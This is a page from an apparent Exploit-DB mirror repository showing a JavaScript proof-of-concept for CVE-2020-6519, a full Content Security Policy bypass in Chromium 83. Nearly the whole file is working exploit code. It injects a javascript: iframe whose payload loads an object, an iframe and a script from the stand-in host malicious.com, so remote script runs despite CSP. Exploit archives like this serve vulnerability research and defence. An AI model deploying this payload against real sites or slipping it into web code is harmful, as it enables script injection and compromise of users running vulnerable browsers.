bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/local/49195.js
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

34 lines
No EOL
992 B
JavaScript
Raw Blame History

#Title: Chromium 83 - Full CSP Bypass
#Date: 02/09/2020
#Exploit Author: Gal Weizman
#Vendor Homepage: https://www.chromium.org/
#Software Link: https://download-chromium.appspot.com/
#Version: 83
#Tested On: Mac OS, Windows, iPhone, Android
#CVE: CVE-2020-6519
(function(){
var payload = `
top.SUCCESS = true;
var o = document.createElement("object");
o.data = \`http://malicious.com/bypass-object-src.html\`;
document.body.appendChild(o);
var i = document.createElement("iframe");
i.src = \`http://malicious.com/bypass-child-src.html\`;
document.body.appendChild(i);
var s = document.createElement("script");
s.src = \`http://malicious.com/bypass-script-src.js\`;
document.body.appendChild(s);
`;
document.body.innerHTML+="<iframe id='XXX' src='javascript:" + payload +"'></iframe>";
setTimeout(() => {
if (!top.SUCCESS) {
XXX.contentWindow.eval(payload);
}
});
}())
// further information: https://github.com/weizman/CVE-2020-6519
Reference in a new issue View git blame Copy permalink